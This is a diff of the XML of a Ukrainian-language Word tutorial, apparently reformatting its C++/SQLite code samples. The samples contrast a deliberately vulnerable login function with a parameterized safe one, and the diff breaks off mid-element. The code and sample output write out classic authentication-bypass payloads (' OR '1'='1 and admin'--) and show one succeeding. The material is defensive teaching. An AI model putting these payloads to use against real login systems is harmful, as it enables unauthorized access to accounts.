+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        return false;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    }</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    bool found = (sqlite3_step(stmt) == SQLITE_ROW);</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    if (found) {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Вхід виконано як: "</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 0) &lt;&lt; " (роль "</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 1) &lt;&lt; ")\n";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    }</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    sqlite3_finalize(stmt);</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    return found;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">}</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">// БЕЗПЕЧНИЙ варіант: структура запиту фіксована, дані передаються</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">// окремо через параметри й ніколи не тлумачаться як код SQL</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">bool safeLogin(sqlite3* db, const std::string&amp; login, const std::string&amp; password) {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    const char* query = "SELECT login, role FROM users WHERE login=? AND password=?";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Запит: " &lt;&lt; query &lt;&lt; "\n";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Параметри: ('" &lt;&lt; login &lt;&lt; "', '" &lt;&lt; password &lt;&lt; "')\n";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    sqlite3_stmt* stmt = nullptr;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    sqlite3_prepare_v2(db, query, -1, &amp;stmt, nullptr);</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    sqlite3_bind_text(stmt, 1, login.c_str(), -1, SQLITE_TRANSIENT);</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    sqlite3_bind_text(stmt, 2, password.c_str(), -1, SQLITE_TRANSIENT);</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    bool found = (sqlite3_step(stmt) == SQLITE_ROW);</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    if (found) {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">        std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Вхід виконано як: "</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 0) &lt;&lt; "\n";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    }</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    sqlite3_finalize(stmt);</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    return found;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">}</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">int main() {</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    sqlite3* db = setupDatabase();</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    std::cout &lt;&lt; "=== Коректний вхід ===\n";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    vulnerableLogin(db, "admin", "secret123");</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    std::cout &lt;&lt; "\n=== Атака SQL-ін'єкцією ===\n";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    // Введене значення закриває лапку й додає умову, істинну завжди</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    std::string injection = "' OR '1'='1";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    bool bypassed = vulnerableLogin(db, "admin", injection);</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "Результат: " &lt;&lt; (bypassed ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено") &lt;&lt; "\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    std::cout &lt;&lt; "Результат: "</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">              &lt;&lt; (bypassed ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено") &lt;&lt; "\n";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    std::cout &lt;&lt; "\n=== Та сама атака на параметризованому запиті ===\n";</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    bool blocked = safeLogin(db, "admin", injection);</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    std::cout &lt;&lt; "Результат: " &lt;&lt; (blocked ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено") &lt;&lt; "\n";</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    std::cout &lt;&lt; "Результат: "</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">              &lt;&lt; (blocked ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено") &lt;&lt; "\n";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    sqlite3_close(db);</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">    return 0;</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">}</w:t>
       </w:r>
     </w:p>
@@ -4086,230 +4265,249 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">============================================================</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">ДЕМОНСТРАЦІЯ SQL-ІН'ЄКЦІЇ</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">============================================================</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">--- Звичайний вхід ---</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">[ВРАЗЛИВИЙ] Запит: SELECT * FROM users WHERE login='admin' AND password='secret123'</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Результат: (1, 'admin', 'secret123', 'admin')</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">--- SQL-ін'єкція: admin'-- ---</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">[ВРАЗЛИВИЙ] Запит: SELECT * FROM users WHERE login='admin'--' AND password='anything'</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">Результат: (1, 'admin', 'secret123', 'admin')</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">АТАКА УСПІШНА! Увійшли без пароля.</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">--- Той самий ввід через безпечний метод ---</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="SourceCode"/>
+        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">[БЕЗПЕЧНИЙ] Запит: SELECT * FROM users WHERE login=? AND password=?</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
